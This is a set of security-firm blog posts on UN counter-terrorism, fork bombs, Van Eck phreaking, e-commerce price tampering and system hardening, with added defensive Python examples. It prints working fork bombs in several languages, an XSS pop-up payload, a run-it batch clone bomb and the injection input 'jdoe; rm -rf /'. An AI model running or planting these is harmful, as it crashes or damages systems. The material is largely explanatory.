Counter Terrorism

Undoubtedly, the United Nations (UN) has not been fully engaged as a platform for counter-terrorism dialogue. Even now, the nature of the UN structure and the sovereign will of nation-states have yet to converge on a pragmatic solution. Similarly, to counter online extremism and radicalization, both the UN and states should open the negotiating door to the private-sector internet industries. The need of the hour is greater cooperation and converging dialogue among all the stakeholders in international peace and security.

Could the international community go beyond definitional lines, which are hard to draw or to agree on broadly for the harmful acts of terror organisations? The pertinent issues for today are having a clear strategy to contain the threat, to take humanitarian action and to learn from the experience.

In retrospect, within a short span of time, the UN pressed for two major events to counter the narratives of violent extremism. The Geneva Conference on Preventing Violent Extremism on April 7 and 8, 2016, jointly organised by Switzerland and the UN, was the first of its kind to address the root causes of terrorism and violent extremism.

To address the threats and work out a comprehensive architecture, the President of the General Assembly, Mogens Lykketoft, organised a high-level thematic debate of the UN General Assembly focused on UN peace and security on May 10 and 11, 2016. The high-level debate was staged to identify key threats and engage in a strategic reflection on today’s challenges to international peace and security.

At the outset, they reaffirmed that ‘terrorism in all its forms and manifestations constitutes one of the most serious threats to international peace and security’; the UNSC also requested its main counter-terrorism subsidiary body to present, by April 30, 2017, a proposal for a comprehensive international framework on the matter.

Narrowly, this debate underlined two factors: the role of the private sector in non-traditional security affairs, and strong commitments to numb the crisis. However, what remains to be seen is the outcome of the aforesaid documents. On the contrary, considering the pace of technological advancement, allowing a year to present the proposal shows thin commitment on pressing issues.

With all regard to some significant anecdotal achievements of the UN during the Cold War, it still remains a place for ‘unproductive dialogue’. Put another way, when it comes to the UN addressing hard-line security issues, ‘realists say no; institutionalists say yes’, to borrow J. Mearsheimer’s idea from ‘The False Promise of International Institutions’. This also became evident when the Indian Prime Minister, Narendra Modi, addressed a gathering of the Indian diaspora in Brussels in April 2016. He underlined that the world body is not defining terrorism and handling the threat adequately.

On a similar note, the former Indian Permanent Representative to the UN, Hardeep Singh Puri, said that ‘the UN, often regarded as the “heart” of the multilateral system, is fading towards obscurity, being described as more of an NGO than a governing multilateral institution’ in his talk ‘Is the UN fit for its purpose at 70?’ at the Observer Research Foundation on December 5, 2015.

In retrospect, the second decade of the twenty-first century began with a very unequal diffusion of power resources. From this vantage point, three scenarios could be drawn: Scenario 1, state vs state; Scenario 2, state vs non-state actors (non-violent) and individuals; Scenario 3, violent non-state actors vs state, individuals and non-state actors. This also reckons with the post-Cold War security debate, viz. national security vs human security.

Swiftly, the significant changes in the currents of geopolitics and the rise of post-Westphalian threats and challenges have become a greater concern for policy makers than the theoretical debates of IR. The post-Westphalian threats and challenges include violent non-state actors (terrorists, hackers, organised syndicates, drug cartels) and challenges such as pandemics and climate change.

There is nevertheless reason to worry. Could the UN manage the multifaceted challenges of the time? On one hand the old actors, the nation-states; the new actors, transnational corporations (specifically internet and telecommunication service providers); and modern barbarians have all been threatening and impinging on the very existence of the UN.

A deconstruction of J. Nye’s ‘chessboard model’ can be canvassed as follows: the first layer is the nation-state (military power), the second layer transnational corporations (economic power) and the third layer terror organisations. In this interconnected world order, states should cooperate and co-opt with the private sector to numb violent extremism.

This is why, for the first time, Steve Crown, Vice-President and Deputy General Counsel of Microsoft Corporation, addressed the world body on terror issues. This leads to the question of where, when and how a comprehensive partnership between the public and private sectors will forge a common line to address cyber-terror issues.

The discourse of our time is the role of the private sector, or big business, in international security. This has been a much debated issue since the 1990s, and pertinent in post-9/11 security affairs. In this new security paradigm the private sector has a lot more to deliver for peace and security.

However, it would make sense to factor in that, to stifle cyber terrorism, the private sector has to be called in, for doing so will heighten the prospects of countering a menace that is proliferating at a pace faster than ever. While addressing the world body, Crown said that public-private partnerships are the appropriate response to cyber terrorism. It is a daunting challenge for both governments and internet industries.

Terrorists manipulate internet platforms, yet there is no distinguished solution to the issue. All scientific innovations, including ICT, can be used for either good or evil. The internet industry was built on the idea that communications could unlock latent human qualities. However, most of the internet giants, including Google, Facebook and Twitter, have engaged with strong intent where their platforms were abused. For instance, there is a greater degree of unity displayed in combating online child sex abuse than, say, terrorist exploitation of technology services.

However, Crown also underlined that ‘we need to admit what we do not know’. Ostensibly, what we do not know is the ‘definition and solution’ to it. The need is for all stakeholders to work together in a coordinated and transparent way.

There are a few takeaways for India. First, India should endow an equitable definition of terrorism. Second, New Delhi should engage with international and regional institutions to address the issues more pragmatically. Last, but not least, India should learn from its past mistakes. After the 26/11 terrorist attacks in Mumbai, big Indian business communities showed great concern at the lack of a security architecture and of cooperation between the public and private sectors. Some open-source assessments have suggested that Indian private industries have been performing well in security and intelligence analysis.

Therefore, there is no harm in forging amicable partnerships to gain help in countering online radicalization, left-wing extremism or in disaster management. Still there is a long way to go; the PPP model, perhaps, can offer some solutions for the virtual and real worlds. Having said that, what remains to be seen is when and how the clear intent to allocate authoritative values for comprehensive security will become a reality.

 

Reference :

  1. Observer Research Foundation

Author : Cialfor

Updated : 27/9/2016

FORK BOMB

A FORK BOMB (also called a WABBIT or RABBIT VIRUS) is equivalent to a denial-of-service attack on your own system. It aims at depriving the system of its RAM (Random Access Memory), leaving none for the vital actions required to keep the system running, and so cracking it: a process continually replicates itself to deplete available system resources, slowing or crashing the system. It can be just 5 characters long. The fork bomb is not deadly to the computer, just annoying.

History

The first version of a fork bomb, called wabbit, was reported to run on a System/360 in 1978. It was derived from a similar attack called RABBITS, reported from 1969 at the University of Washington.

Implementation & Operation

Fork bombs operate by consuming CPU time in the process of forking (an operation whereby a process creates a copy of itself; it is usually a system call implemented in the kernel, and fork is the primary method of process creation on Unix-like operating systems), and by saturating the operating system’s process table.

A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process.

Every program doubling itself is a form of exponential growth. After one iteration of the loop, two programs are created. After another cycle each of these creates two more, for a total of four identical programs; after 10 iterations we have 2^10 = 1024 programs, and after 100 iterations we have 2^100, roughly 1.267 nonillion.

Even with today’s CPUs and RAM in the giga range, the first program will probably not even complete 50 iterations before running out of memory.

Every iteration takes only a few milliseconds, so running it will definitely crash the computer.

In UNIX operating systems, fork bombs are generally written to use the fork system call. As forked processes are also copies of the first program, once they resume execution from the instruction following the fork call, they also seek to create a copy of themselves; this has the effect of causing exponential growth in processes. As modern UNIX systems generally use copy-on-write when forking new processes, a fork bomb generally will not saturate such a system’s memory.

Microsoft Windows operating systems do not have functionality equivalent to the UNIX fork system call; a fork bomb on such an operating system must therefore create a new process instead of forking from an existing one.

 

Fork bombs on different operating systems

  • A fork bomb using the Bash shell on Linux and other Unix-like systems:

:(){ :|:& };:


 

  • A fork bomb using a Microsoft Windows batch file:

:s
start "" %0
goto s


 

  • The same as above, but shorter:

%0|%0


 

  • Using Python:

import os

while True:
    os.fork()


 

  • Using C:

#include <unistd.h>

int main(void)
{
    while (1)
        fork();
}


 

JavaScript code that can be injected into a web page via an XSS vulnerability, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML || document.documentElement.innerHTML);
}
</script>


 

Or, a more aggressive version:

<script>
setInterval(function() {
  var w = window.open();
  w.document.write(document.documentElement.outerHTML || document.documentElement.innerHTML);
}, 10);
</script>


 

 

 

LIVE FORK BOMBING

Step 1: Copy the following code into Notepad:

@echo off

set name=%0

set clone=1

:start

:clone

If not exist clone%clone%.bat (

copy "%name%" "clone%clone%.bat"

) else (

set /a clone=%clone%+1

GoTo clone

)

start %name%

start clone%clone%.bat

GoTo start

Pause

Step 2: Save it with the .bat file extension.

Step 3: Run it.

 


DISADVANTAGES

  1. Fork bombs are very difficult to stop once started. Stopping a fork bomb from reproducing further requires stopping all running copies, which is very hard to achieve.
  2. The second major problem is that in the time taken between finding the processes to terminate and actually terminating them, more may have been created.

 

Some fork bombs can be stopped relatively easily. Consider the Bash bomb again:

:(){ :|: & };:


 

By replacing the function identifier ':' with 'bomb' and re-indenting, the code reads:

bomb() {
    bomb | bomb &
};
bomb


 

The fork bomb is a function that runs copies of itself in the background; the '&' ensures that the child process does not die, and each copy keeps forking new copies of the function, consuming system resources.

A ‘feature’ of this code is that a bomb process which can no longer fork does not linger but exits. In such a situation, if we try to run a new process, one will eventually start successfully. If the new process does nothing, it still holds a process slot that the bomb cannot take back. At this point the do-nothing processes can exit. The following short loop might get rid of the above fork bomb in about a minute:

while ( sleep 100 & ) do; done


 

Alternatively, stopping (‘freezing’) the bomb’s processes can be used so that a subsequent kill can terminate them without any of the parts re-replicating due to newly available process slots:

killall -STOP processWithBombName
killall -KILL processWithBombName


 

When a system is low on free PIDs (in Linux the maximum number of PIDs can be obtained from /proc/sys/kernel/pid_max), defusing a fork bomb becomes more difficult:

$ killall -9 processWithBombName
bash: fork: Cannot allocate memory


 

In this case, defusing the fork bomb is only possible if at least one shell is open. Processes may not be forked, but one can execve() any program from the current shell. Typically, only one attempt is possible.

killall -9 cannot simply be executed once from the shell, because the command is not atomic and does not hold locks on the process list, so by the time it finishes the fork bomb will have advanced some generations. So one must launch a stream of killall processes, for example:

while :; do killall -9 processWithBombName; done


 

On Linux, because the process table is made accessible through the /proc file system, it is possible to defuse the fork bomb using Bash built-ins which do not require forking new processes. The following example identifies offending processes and suspends them, to prevent their continuing to fork while they are killed one at a time. This avoids the race condition of the other examples, which can fail if the offending processes can fork faster than they are killed.

cd /proc && for p in [0-9]*; do read cmd < "$p/cmdline"; if [[ $cmd = processWithBombName ]]; then kill -s STOP "$p" || kill -s KILL "$p"; fi; done


 

Preventive measures

The fork bomb’s mode of operation is entirely encapsulated in creating new processes; one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.
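The freeze-then-kill defusing described in the /proc loop and the killall -STOP / -KILL pair above, together with a check for the per-user process cap that the preventive measure recommends, as an added example that is not code from the original post. It assumes a Linux-style /proc layout (one numeric directory per PID holding a NUL-separated cmdline file); the process name bombname and the PIDs in build_fixture() are constructed so the plan can be inspected with a fake process table instead of a live bomb.

```python
"""Added example (not from the original post): freeze every matching
process before killing any of them, driven from /proc, with a dry-run
mode that returns the plan instead of sending signals.

Assumptions: Linux-style /proc (numeric dirs, NUL-separated 'cmdline');
'bombname', the PIDs and the fixture tree are constructed for the demo."""
import os
import resource
import signal
import tempfile


def scan_proc(proc_root="/proc"):
    """Yield (pid, argv0 basename) for every process visible under proc_root."""
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as fh:
                raw = fh.read()
        except OSError:
            continue  # the process exited between listdir() and open()
        argv0 = raw.split(b"\0", 1)[0].decode(errors="replace")
        yield int(entry), os.path.basename(argv0)


def plan_defuse(name, proc_root="/proc"):
    """Ordered (signal, pid) actions. Every match is frozen with STOP before
    any is killed, so the survivors cannot fork into PID slots freed by the
    kills; that is the race the one-at-a-time loop can lose."""
    pids = sorted(pid for pid, argv0 in scan_proc(proc_root) if argv0 == name)
    return [("STOP", p) for p in pids] + [("KILL", p) for p in pids]


def defuse(name, proc_root="/proc", dry_run=True):
    """Carry out plan_defuse(); with dry_run=True nothing is signalled."""
    plan = plan_defuse(name, proc_root)
    if not dry_run:
        for sig, pid in plan:
            try:
                os.kill(pid, getattr(signal, "SIG" + sig))
            except ProcessLookupError:
                pass  # already gone
    return plan


def nproc_limit_is_set():
    """True when this user's process count is capped (soft RLIMIT_NPROC),
    the preventive measure the article recommends."""
    soft, _hard = resource.getrlimit(resource.RLIMIT_NPROC)
    return soft != resource.RLIM_INFINITY


def build_fixture(name="bombname"):
    """Constructed fake /proc: three bomb processes, init, and a bystander
    whose name merely starts with the bomb's name."""
    root = tempfile.mkdtemp()
    table = {4242: name, 4243: name, 4244: name, 1: "init", 999: name + "d"}
    for pid, argv0 in table.items():
        os.mkdir(os.path.join(root, str(pid)))
        with open(os.path.join(root, str(pid), "cmdline"), "wb") as fh:
            fh.write(argv0.encode() + b"\0-x\0")  # argv0, then one argument
    return root


if __name__ == "__main__":
    root = build_fixture()
    for action in defuse("bombname", root, dry_run=True):
        print(*action)
    print("per-user process limit set:", nproc_limit_is_set())
```

Run against the real process table, defuse("bombname", dry_run=False) only signals exact argv[0] matches, and the STOP pass completes before the first KILL is sent, which is what makes the kills safe against re-forking. nproc_limit_is_set() returning False is the condition the preventive measure is meant to fix.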

Reference :

  1. www.google.com
  2. www.wikipedia.com
  3. www.racoonlab.com

Author : cialfor

Updated : 9/26/2016

Van Eck Phreaking: A Hack Using Electromagnetic Radiation

Van Eck phreaking is a form of eavesdropping in which special equipment is used to pick up side-band electromagnetic emissions from electronic devices that correlate to hidden signals or data, for the purpose of recreating those signals or data in order to spy on the electronic device. Side-band electromagnetic radiation emissions are present in, and with the proper equipment can be captured from, keyboards, computer displays, printers and other electronic devices.

Van Eck phreaking of CRT displays is the process of eavesdropping on the contents of a CRT by detecting its electromagnetic emissions. It is named after Dutch computer researcher Wim van Eck, who in 1985 published the first paper on it, including a proof of concept. Phreaking is the process of exploiting telephone networks; the word is used here because of its connection to eavesdropping.

Basic principle

Information that drives the video display takes the form of high frequency electrical signals. These oscillating electric currents create electromagnetic radiation in the RF range. These radio emissions are correlated to the video image being displayed, so, in theory, they can be used to recover the displayed image.

CRTs

In a CRT the image is generated by an electron beam that sweeps back and forth across the screen. The electron beam excites the phosphor coating on the glass and causes it to glow. The strength of the beam determines the brightness of individual pixels. The electric signal which drives the electron beam is amplified to hundreds of volts from TTL circuitry. This high-frequency, high-voltage signal creates electromagnetic radiation that has, according to Van Eck, “a remarkable resemblance to a broadcast TV signal”. The signal leaks out from displays and may be captured by an antenna, and once synchronization pulses are recreated and mixed in, an ordinary analog television receiver can display the result. The synchronization pulses can be recreated either through manual adjustment or by processing the signals emitted by the electromagnetic coils as they deflect the CRT’s electron beam back and forth.[1]

In the paper, Van Eck reports that in February 1985 a successful test of this concept was carried out with the cooperation of the BBC. Using a van filled with electronic equipment and equipped with a VHF antenna array, they were able to eavesdrop from a “large distance”.

Van Eck phreaking and protecting a CRT display from it was demonstrated on an episode of Tech TV’s The Screen Savers on December 18, 2003.

LCDs

In April 2004, academic research revealed that flat panel and laptop displays are also vulnerable to electromagnetic eavesdropping. The required equipment for espionage was constructed in a university lab for less than US$2000.

Communicating using Van Eck phreaking

In January 2015, the Airhopper project from the Georgia Institute of Technology, USA, demonstrated (at Ben Gurion University, Israel) the use of Van Eck phreaking to let a keylogger communicate, through manipulation of the video signal, the keys pressed on the keyboard of a standard PC to a program running on an Android phone with an earbud radio antenna.

Tailored Access Batteries

A tailored access battery is a special laptop battery with Van Eck phreaking electronics and power side-band encryption-cracking electronics built into the casing of the battery, in combination with a remote transmitter/receiver. This allows quick installation and removal of the spying device by simply switching the battery.

Countermeasures

Countermeasures are detailed in the article on TEMPEST, NATO’s standard on spy-proofing digital equipment. One countermeasure involves shielding the equipment to minimize electromagnetic emissions. Another method, specifically for video information, scrambles the signals such that the image is perceptually undisturbed but the emissions are harder to reverse-engineer into images. Examples of this include low-pass filtering fonts and randomizing the least significant bit of the video data.

Another approach is to randomly shift the frequency of the clock used on keyboards with a custom chip containing a pseudorandom number generator (PRNG) with a long length and use an identical synchronized PRNG at the reception end to confound such attacks.

Tools

Eckbox is van Eck phreaking software. It interprets a radio signal emanating from a computer’s monitor to recreate the image (in black and white) that is displayed on it. This could be used as a valuable security tool for testing otherwise secure computers, or for developing hardware and software to counter this type of remote shoulder-surfing.


Reference :

  1. www.wikipedia.com
  2. www.bernardotti.it
  3. www.popscreen.com

Author : cialfor

Updated : 9/26/2016

 

Introduction to E-Shoplifting

The word shoplifting (also known as boosting or the five-finger discount) means the act of stealing goods from a retail establishment, as opposed to burglary or robbery. In the cyber world, the term e-shop refers to an online retail establishment which sells goods over the internet.

E-shoplifting is the modern art of stealing goods from an online e-commerce store with the aim of getting them for free or at a lower cost. E-shoplifting is a trending cyber-crime mechanism which poses a major threat to e-merchants, banks, payment gateways and e-commerce organizations nowadays.

Basic Elements of an Electronic Business

Payment Gateway :

The payment gateway is an e-commerce application that ensures security measures for transactions performed online. When a customer adds a product to the cart, it directs him to the payment gateway to make the transaction using the desired bank to pay for the product. The gateways provide a One Time Password (OTP) for customers to use the gateway, so that the transaction takes place securely.

Multi-Layer Components :

The multi-layer component in an e-commerce system is the layer that provides the link between the different components of the system and brings them onto one platform. The multi-layer components in an e-commerce store link the store’s database and the payment gateway with the store front-end.

Shopping Cart System :

The Shopping cart system is the temporary storage area which the e-commerce sites provide to purchase multiple goods at the same time. It gives a good result at the customer’s end by allowing the customer to purchase multiple products from different dealers who have registered with the e-store. It also allows the user to get the overall price estimate of the product added to the cart.

Session Management System :

The session management system in an e-commerce site allows the store to keep track of all the user’s log-in and log-out sessions. By this the store keeps track of the customers registered with the store. It also maintains the cookie policy management of the e-commerce store and keeps track of the cookies.

Customer :

Also referred to as the buyer is the individual who makes use of this e-commerce stores to purchase a product.

 

Flaws in e-commerce systems :

  • Poor input validation by e-commerce sites allows hackers through the gateway of the site’s servers. Validation in e-shops is required to authenticate whether the data that enters the server from the user’s end is genuine or not; when monitoring is poor the validation becomes poor, and a user without any proper authentication from the server’s end gets into the server and inserts malicious code, which later triggers manipulation of data on the server.

 

  • Hidden field manipulation is a type of attack performed on e-shops. Hidden form fields are often used by retailers to save information about a customer’s session, and many also use them to save merchandise prices. On unprotected sites hackers can use these fields to manipulate prices, by which they obtain items for a lower fee or for free.

 

  • Improper use of cookies allows hackers to manipulate the cookies used by e-shops and exploit the shops. Cookies are set by e-commerce sites to track the customer’s previous session. Once a customer logs in to the e-commerce site, it creates a small file with the customer’s system information and saves it on the customer’s computer, so that if some item was left in the cart in the previous session it will still be there when the customer logs in the next time. Hackers insert malicious code into these cookies and log in to the e-commerce site; once the session has successfully started, the malicious code manipulates the web page.

 

  • Poor session or state tracking at the website’s end is also a flaw in e-shops. Every time the user logs in to the website, it registers a session in the e-commerce database. Due to poor session tracking, a hacker can easily bypass the security mechanism and perform various actions in the e-commerce site and its database.

 

  • Improper database integration means poor protection or monitoring of the e-commerce site’s database. These databases contain the cost of the products, the customer details and the supplier details. The hacker reaches this database, which is an SQL database, through one of the previous flaws and exploits it using SQL injection, a code injection technique used to attack SQL databases. Once the SQL injection is inserted into the database, it will change the price values of all the products.

 

  • Security loopholes in payment gateways are a major attack in the e-commerce market. The hacker enters the e-commerce site and makes a purchase on the site using one of the steps mentioned earlier. Once the product is added to the cart, he clicks on payment and selects the payment method. When he clicks on pay, the e-commerce site directs him to a payment gateway registered with the site. During this process the hacker extracts the script code of the payment gateway site, manipulates the script and changes the price value of the product purchased, due to which he gets the product at a lower cost.
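The hidden-field and script price manipulation described in the flaws above, as an added example that is not part of the original post: a checkout that trusts the price field the browser sends back, beside one that re-prices every line from the server’s own catalogue and validates the quantity. The catalogue, SKUs, prices and form dicts are constructed for the demonstration; any web framework’s request object would supply the same fields.

```python
"""Added example (not from the original post): vulnerable vs hardened
checkout. CATALOG, the SKUs, prices and the order dicts are constructed."""
from decimal import Decimal

# Constructed server-side catalogue: the only trustworthy source of prices.
CATALOG = {
    "SKU-1001": Decimal("499.00"),   # laptop
    "SKU-2002": Decimal("19.99"),    # cable
}


class CheckoutError(ValueError):
    """Raised when a submitted order cannot be priced from the catalogue."""


def checkout_vulnerable(form):
    """Trusts the 'price' hidden field the browser sent back, so anyone who
    edits the form (or the gateway script) names their own price, and a
    negative quantity even turns the total into a credit."""
    total = Decimal("0")
    for item in form["items"]:
        total += Decimal(item["price"]) * int(item["qty"])
    return total


def checkout_hardened(form, catalog=CATALOG):
    """Ignores any client-supplied price: the server looks each SKU up in
    its own catalogue, bounds the quantity, and recomputes the total."""
    total = Decimal("0")
    for item in form["items"]:
        sku = item.get("sku")
        if sku not in catalog:
            raise CheckoutError(f"unknown sku {sku!r}")
        try:
            qty = int(item.get("qty", 0))
        except (TypeError, ValueError):
            raise CheckoutError("quantity is not an integer")
        if not 1 <= qty <= 100:
            raise CheckoutError(f"quantity {qty} out of range")
        total += catalog[sku] * qty
    return total


def tampered_order():
    """Constructed POST body after the shopper edited the hidden price
    field: the laptop for one cent."""
    return {"items": [{"sku": "SKU-1001", "price": "0.01", "qty": "1"}]}


def honest_order():
    """Constructed POST body with the prices the page originally rendered."""
    return {"items": [{"sku": "SKU-1001", "price": "499.00", "qty": "1"},
                      {"sku": "SKU-2002", "price": "19.99", "qty": "2"}]}


if __name__ == "__main__":
    print("vulnerable, tampered:", checkout_vulnerable(tampered_order()))  # 0.01
    print("hardened,   tampered:", checkout_hardened(tampered_order()))    # 499.00
    print("hardened,   honest  :", checkout_hardened(honest_order()))      # 538.98
```

The hardened version never reads the submitted price at all; the client may keep sending it for display purposes, but the amount passed to the payment gateway comes from the server-side recomputation, which is what closes both the hidden-field and the modified-gateway-script variants described above.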

 

Author : cialfor

Updated : 9/26/2016

Reference :

  1. www.google.com
  2. en.wikipedia.org

 

 

 

 

 

 

How to Fight Footprinting

  1. Take offline any information that has the potential to identify and compromise your organization’s security through footprinting, such as access to business plans, formulas and proprietary documents.
  2. Determine the level of information about your organization that is necessary for the public and make only that available on the network.
  3. Visit your organization on the web to determine current insecurities and the attributes needing protection.
  4. Run a ping sweep on your organizational network to see what results an outsider would get.
  5. Familiarize yourself with the American Registry for Internet Numbers (ARIN) to determine network blocks.

Top Ten Ways to Secure Against Attack

 

  1. Keep patches up to date by installing weekly or daily if possible. Buffer overflow and privilege escalation attacks can usually be prevented by keeping patches up-to-date. Check your vendor’s site daily for new patch releases and monitor the Computer Emergency Response Team’s site, http://www.cert.org, for information on the latest vulnerabilities.
  2. Shut down unnecessary services/ports. Review your installation requirements by eliminating unnecessary services and applications. Perform a post-installation lockdown and hardening of the machine. Lance Spitzner, Senior Security Architect for Sun Microsystems, Inc. authors a useful site, http://www.enteract.com/~lspitz, with more information.
  3. Change default passwords by choosing strong passwords that utilize uppercase/ lowercase/ numbers/special characters. Some database applications create a database administrator account with no password. To protect against this vulnerability, test the accounts after install, and if no password is found on any account, disable the account or set a strong password. Weak passwords are not much better than no password at all. Examples of weak passwords include the user’s name, birth date, or a dictionary word. Educate your administrators and users about the importance of strong passwords. A strong password should contain upper and lower case letters, as well as numbers and special characters (!, #, $, etc). A strong password should also be at least 7-8 characters in length, depending on operating system. Many operating systems provide means for requiring complex passwords, when enabled. More extreme countermeasures include one-time password mechanisms.
  4. Control physical access to systems. Protecting physical access to computer systems is as important as protecting computer access. Be sure employees lock down consoles when not in use—an unlocked desktop screen can instantly allow a hacker access to the network as a privileged user. A hacker may also gain access to the network via a network jack in a conference room or any non-restricted area. Data centers and network closets should be treated with vigilance as well. Even a locked door may not be enough protection in the face of a determined attacker. Alarms, video cameras, raised floors, security guards, customer accessible cages, biometric scans, and ID cards may be necessary to adequately defend against network attacks.
  5. Curtail unexpected input. Some web pages allow users to enter usernames and passwords. These pages can be abused by a user who enters more than just a username, for example Username: jdoe; rm -rf / which might allow an attacker to remove the root file system from a UNIX server. Programmers should limit input characters, and not accept invalid characters such as | ; < > as input.
  6. Perform backups and test them on a regular basis.
  7. Educate employees about the risks of social engineering and develop strategies to validate identities over the phone, via e-mail, or in person.
  8. Encrypt and password-protect sensitive data. Data such as Web accessible e-mail should be considered sensitive data and should be encrypted. This will discourage any type of sniffer program or exposure of sensitive company data.
  9. Implement security hardware and software. Firewalls and intrusion detection systems should be installed at all perimeters of the network. Viruses, Java, and ActiveX can potentially harm a system. Anti-virus software and content filtering should be utilized to minimize this threat.
  10. Develop a written security policy for the company. These methods will help to lessen footprinting attacks, which lead to your computer or your company being hacked. With that said, a company has to stay vigilant at all times, as new methods of intrusion are being developed almost daily.
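Item 5 above (curtail unexpected input), as an added example that is not code from the original page: an allowlist check on the username that rejects the | ; < > family of shell metacharacters, and a lookup that never passes user input through a shell at all, so a value like jdoe; rm -rf / can only ever be one argument. The username policy (letters, digits, dot, underscore, hyphen, 1 to 32 characters) is an assumed one, and the external id command is used only as an illustrative lookup.

```python
"""Added example (not from the original page): allowlist validation plus a
shell-free lookup. USERNAME_RE is an assumed policy; 'id' is only an
illustrative command."""
import re
import subprocess

# Assumed policy: first char alphanumeric, then up to 31 of [A-Za-z0-9._-].
USERNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,31}")
# The characters the article warns about, plus the other common shell
# metacharacters; used only to explain a rejection, not as the check itself.
FORBIDDEN = set("|;<>&$`\\\"'\n")


def validate_username(username):
    """Allowlist check: True only when the whole string matches the policy."""
    return bool(USERNAME_RE.fullmatch(username))


def rejected_characters(username):
    """Which of the warned-about characters a string contains (for logging)."""
    return sorted(ch for ch in set(username) if ch in FORBIDDEN)


def build_lookup_argv(username):
    """Build the argv for an account lookup after validation. Because the
    name becomes a single argv element and no shell is involved, even an
    unvalidated 'jdoe; rm -rf /' would be one literal argument, never a
    second command."""
    if not validate_username(username):
        raise ValueError(f"invalid username, rejected characters: "
                         f"{rejected_characters(username)}")
    return ["id", username]


def lookup_user(username):
    """Run the lookup with shell=False and return (returncode, stdout)."""
    proc = subprocess.run(build_lookup_argv(username), capture_output=True,
                          text=True, check=False)
    return proc.returncode, proc.stdout.strip()


if __name__ == "__main__":
    for name in ["jdoe", "jdoe; rm -rf /", "a" * 33, "root`id`"]:
        print(f"{name!r:20} valid={validate_username(name)!s:5} "
              f"rejected={rejected_characters(name)}")
```

The allowlist is the primary control: it says what a username may look like rather than enumerating bad characters, so anything outside the policy, not just the four characters the article names, is refused. The argv list is defence in depth for the case where validation is bypassed or forgotten.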

Author : cialfor

Updated : 9/26/2016

Reference :

  1. wikipedia
  2. image credit to google
  3. introduction to cyber security –  Data64

Nonstandard ports and port hopping (network security). Evasive applications are one of the key factors leading to the demise of traditional port-based firewalls. However, traditional IPS and threat products also rely heavily on port to determine which signatures or analysis to apply to the traffic. This weakness is magnified by the fact that APTs often communicate from the inside of an infected network back to the remote attacker outside. This gives the attacker full flexibility to use any port, protocol and encryption that he wants, fully subverting any port-based controls in the process.

SSL encryption. Malware creators rely heavily on various forms of encryption to hide the initial infection traffic, as well as the ongoing command-and-control traffic associated with botnets. SSL is a favorite, simply because it has become the default protocol for so many social media sites, such as Gmail and Facebook. These sites are coincidentally very fertile ground for social engineering and malware delivery. As a result of SSL encryption, many IT security teams lack the ability to see malware traffic on their network. Other types of encryption have also become popular for hiding malware traffic. Peer-to-peer applications provide both infection and command-and-control capabilities, and often use proprietary encryption, again allowing malicious content to pass through the traditional network perimeter undetected.
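The check that the port-based controls in the two paragraphs above cannot make, as an added example that is not code from the original page: identify a flow’s protocol from the first bytes of its payload rather than from its port, then flag flows where the two disagree (TLS on a port other than 443, cleartext HTTP or SSH on 443, a known protocol on an unregistered port). Even when the payload is encrypted, the TLS record header itself is visible, which is what makes off-port TLS detectable. The port policy and the sample flows are constructed for the demonstration; the addresses are from the RFC 5737 documentation ranges.

```python
"""Added example (not from the original page): port-independent protocol
identification over constructed flows. EXPECTED and SAMPLE_FLOWS are
constructed; they describe no real network."""

TLS_HANDSHAKE = 0x16                                        # record type: handshake
TLS_RECORD_VERSIONS = {0x0300, 0x0301, 0x0302, 0x0303}      # SSLv3 .. TLS 1.3 record layer
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")
EXPECTED = {80: "http", 443: "tls", 22: "ssh"}              # constructed port policy


def identify(payload):
    """Classify a payload as 'tls', 'http', 'ssh' or 'unknown' by content only."""
    if (len(payload) >= 3 and payload[0] == TLS_HANDSHAKE
            and int.from_bytes(payload[1:3], "big") in TLS_RECORD_VERSIONS):
        return "tls"
    if payload.startswith(HTTP_METHODS):
        return "http"
    if payload.startswith(b"SSH-2.0-"):
        return "ssh"
    return "unknown"


def audit(flows):
    """flows: iterable of (src, dst, dport, first_payload_bytes).
    Returns one dict per flow with the observed protocol and a verdict."""
    results = []
    for src, dst, dport, payload in flows:
        seen = identify(payload)
        expected = EXPECTED.get(dport)
        if expected is not None:
            verdict = ("ok" if seen == expected
                       else f"mismatch: {seen} on port {dport}, expected {expected}")
        elif seen != "unknown":
            verdict = f"{seen} on nonstandard port {dport}"
        else:
            verdict = "unclassified"
        results.append({"src": src, "dst": dst, "dport": dport,
                        "seen": seen, "verdict": verdict})
    return results


def count_suspicious(flows):
    """Number of flows whose protocol contradicts or escapes the port policy."""
    return sum(1 for r in audit(flows) if r["verdict"] not in ("ok", "unclassified"))


# Constructed sample payloads: the start of a TLS ClientHello record, an
# HTTP request line, an SSH banner and opaque binary.
CLIENT_HELLO = b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03"
SAMPLE_FLOWS = [
    ("10.0.0.5",  "203.0.113.10", 443,  CLIENT_HELLO),                          # normal HTTPS
    ("10.0.0.7",  "198.51.100.9", 8080, CLIENT_HELLO),                          # TLS off-port
    ("10.0.0.8",  "203.0.113.4",  443,  b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"),  # cleartext on 443
    ("10.0.0.9",  "203.0.113.5",  80,   b"SSH-2.0-OpenSSH_8.9\r\n"),            # SSH hiding on 80
    ("10.0.0.10", "192.0.2.8",    4444, b"\x00\x01\x02\x7f\xff"),               # opaque, unknown port
]

if __name__ == "__main__":
    for r in audit(SAMPLE_FLOWS):
        print(f"{r['src']:>10} -> {r['dst']}:{r['dport']:<5} {r['seen']:<8} {r['verdict']}")
    print("suspicious flows:", count_suspicious(SAMPLE_FLOWS))
```

The unclassified flow on port 4444 is the honest answer for proprietary or custom encryption: content inspection cannot name it, which is why the paragraph above treats unknown encrypted traffic on unregistered ports as its own category to watch rather than something a signature will catch.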

Tunneling. Tunneling provides yet another tool for attackers to hide malicious traffic. Many applications and protocols support the ability to tunnel other applications and protocols within them. This lets attackers disguise their communications as allowed services or applications to get past traditional perimeter security solutions.

